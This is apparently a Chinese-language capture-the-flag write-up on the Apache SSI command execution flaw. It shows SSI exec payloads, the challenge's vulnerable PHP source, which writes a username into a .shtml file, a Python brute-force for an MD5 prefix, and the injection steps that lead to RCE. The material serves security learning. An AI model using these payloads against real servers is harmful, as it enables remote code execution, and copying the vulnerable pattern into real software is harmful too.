首先关于Apache SSI命令执行漏洞网上讲解也不多,这个漏洞主要是与配置有关,也很简单
使用条件:
SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。
如果服务端开启了SSI,那么就可以通过上传一个shtml文件(上传内容的是命令执行)从而达到RCE效果
用法:
ssi的语法格式类似HTML的注释,因此正确启用ssi之后,浏览器可以忽略他但是源码仍然可见,服务器会对特定的ssi指令解析,从而实现少量动态内容的添加。
<!--#exec cmd="id" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="cat /flag.php" -->
诸如此类都可
如何实现RCE:
前面使用条件那说过,可以简单理解为:shtml页面的内容被服务端进行评估解析后添加到该shtml页面,首先语句<–#exec cmd=“ls”–>被服务端解析成功,返回结果会直接返回到该SHTML页面
一道SSI的题目:
题目地址在buuctf里面:
进去的页面:
扫描到index.php.swp,读取index.php的源码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
看到一个$admin == substr(md5($_POST[‘password’]),0,6)),脚本爆破一下即可
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
得到:
#2305004
#9162671
再看一下有一个shtml页面,写内容是通过username写入的,那username就输入:
<!--#exec cmd="ls" -->
然后抓包看到一个提示信息:
也就是我们的shtml页面,那就直接访问就好了
最后拿道flag
参考链接:
https://blog.csdn.net/qq_45521281/article/details/107576959
https://cloud.tencent.com/developer/article/1540513